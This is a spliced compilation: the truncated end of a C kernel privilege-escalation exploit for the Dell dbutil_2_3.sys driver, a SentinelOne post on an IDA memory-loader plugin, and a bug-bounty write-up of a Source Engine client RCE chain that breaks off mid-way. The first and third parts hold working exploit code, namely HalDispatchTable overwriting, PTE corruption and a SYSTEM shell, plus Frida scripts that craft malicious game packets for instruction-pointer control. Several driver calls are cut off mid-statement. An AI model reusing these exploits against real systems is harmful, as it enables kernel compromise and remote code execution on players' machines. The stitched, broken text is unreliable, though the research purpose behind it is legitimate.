				inBuf5[2] = three5;
				inBuf5[3] = four5;

				inBuf6[0] = one6;
				inBuf6[1] = two6;
				inBuf6[2] = three6;
				inBuf6[3] = four6;

				inBuf7[0] = one7;
				inBuf7[1] = two7;
				inBuf7[2] = three7;
				inBuf7[3] = four7;

				inBuf8[0] = one8;
				inBuf8[1] = two8;
				inBuf8[2] = three8;
				inBuf8[3] = four8;

				inBuf9[0] = one9;
				inBuf9[1] = two9;
				inBuf9[2] = three9;
				inBuf9[3] = four9;

				inBuf10[0] = one10;
				inBuf10[1] = two10;
				inBuf10[2] = three10;
				inBuf10[3] = four10;

				inBuf11[0] = one11;
				inBuf11[1] = two11;
				inBuf11[2] = three11;
				inBuf11[3] = four11;

				DWORD bytesReturned3 = 0;
				DWORD bytesReturned4 = 0;
				DWORD bytesReturned5 = 0;
				DWORD bytesReturned6 = 0;
				DWORD bytesReturned7 = 0;
				DWORD bytesReturned8 = 0;
				DWORD bytesReturned9 = 0;
				DWORD bytesReturned10 = 0;
				DWORD bytesReturned11 = 0;

				BOOL interact2 = DeviceIoControl(

				BOOL interact3 = DeviceIoControl(

				BOOL interact4 = DeviceIoControl(

				BOOL interact5 = DeviceIoControl(

				BOOL interact6 = DeviceIoControl(

				BOOL interact7 = DeviceIoControl(

				BOOL interact8 = DeviceIoControl(

				BOOL interact9 = DeviceIoControl(

				BOOL interact10 = DeviceIoControl(

				// A lot of error handling
				if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
					printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
					printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

					// Clear the no-eXecute bit
					unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

					printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

					// Clear the no-eXecute bit in the actual PTE
					// Buffer to send to the driver (write primitive)
					unsigned long long inBuf13[4];

					// Values to send
					unsigned long long one13 = 0x4141414141414141;
					unsigned long long two13 = shellcodePte;
					unsigned long long three13 = 0x0000000000000000;
					unsigned long long four13 = taintedPte;

					// Assign the values
					inBuf13[0] = one13;
					inBuf13[1] = two13;
					inBuf13[2] = three13;
					inBuf13[3] = four13;

					// Interact with the driver
					DWORD bytesReturned13 = 0;

					BOOL interact12 = DeviceIoControl(

					// Error handling
					if (!interact12)
						printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
						printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

						// Offset to nt!HalDispatchTable+0x8
						unsigned long long halDispatch = baseofKernel + 0x427258;

						// Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
						// Buffer to send to the driver (write primitive)
						unsigned long long inBuf14[4];

						// Values to send
						unsigned long long one14 = 0x4141414141414141;
						unsigned long long two14 = halDispatch;
						unsigned long long three14 = 0x0000000000000000;
						unsigned long long four14 = 0x0000000000000000;

						// Assign the values
						inBuf14[0] = one14;
						inBuf14[1] = two14;
						inBuf14[2] = three14;
						inBuf14[3] = four14;

						// Interact with the driver
						DWORD bytesReturned14 = 0;

						BOOL interact13 = DeviceIoControl(

						// Error handling
						if (!interact13)
							printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
							// Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
							unsigned long long preservedHal = inBuf14[3];

							printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

							// Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
							// Buffer to send to the driver (write primitive)
							unsigned long long inBuf15[4];

							// Values to send
							unsigned long long one15 = 0x4141414141414141;
							unsigned long long two15 = halDispatch;
							unsigned long long three15 = 0x0000000000000000;
							unsigned long long four15 = shellcodeLocation;

							// Assign the values
							inBuf15[0] = one15;
							inBuf15[1] = two15;
							inBuf15[2] = three15;
							inBuf15[3] = four15;

							// Interact with the driver
							DWORD bytesReturned15 = 0;

							BOOL interact14 = DeviceIoControl(

							// Error handling
							if (!interact14)
								printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
								printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

								// Locating nt!NtQueryIntervalProfile
								NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(

								// Error handling
								if (!NtQueryIntervalProfile)
									printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
									// Print update for found ntdll!NtQueryIntervalProfile
									printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

									// Calling nt!NtQueryIntervalProfile
									ULONG exploit = 0;


									// Restoring nt!HalDispatchTable+0x8
									// Buffer to send to the driver (write primitive)
									unsigned long long inBuf16[4];

									// Values to send
									unsigned long long one16 = 0x4141414141414141;
									unsigned long long two16 = halDispatch;
									unsigned long long three16 = 0x0000000000000000;
									unsigned long long four16 = preservedHal;

									// Assign the values
									inBuf16[0] = one16;
									inBuf16[1] = two16;
									inBuf16[2] = three16;
									inBuf16[3] = four16;

									// Interact with the driver
									DWORD bytesReturned16 = 0;

									BOOL interact15 = DeviceIoControl(

									// Error handling
									if (!interact15)
										printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
										printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
										printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

										// Spawning an NT AUTHORITY\SYSTEM shell
										system("cmd.exe /c cmd.exe /K cd C:\\");

// Call exploitWork()
void main(void)

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the loaders in the loaders directory of IDA.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  • Place the memory loader DLL in the IDA directory folder.
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:


  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.


  1. Open any file on your computer in a directory you have write privileges to.
  2. The UrlLoader will suggest a file to open.
  3. After you chose UrlLoader, you will be asked enter a URL:
  4. The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

  1. The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64 bit IDA with 64 BIT addresses
    2. X32 | X64 – 64 bit IDA with 32 BIT addresses


  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files: (Similar in: (X64 | x64) and( X64 | X32)
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
  • X64 | X32
    1. idasdk75\lib\x64_win_vc_32
    2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
  • Conclusion

    When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

    Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

    Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

    The SentinelOne IDA Pro Memory Loader Plugin is available on Github.


The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida


Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:


This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:


Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:


In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:


This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	return !buffer.IsOverflowed();

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:


The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?

    // Baseline?

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:


As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

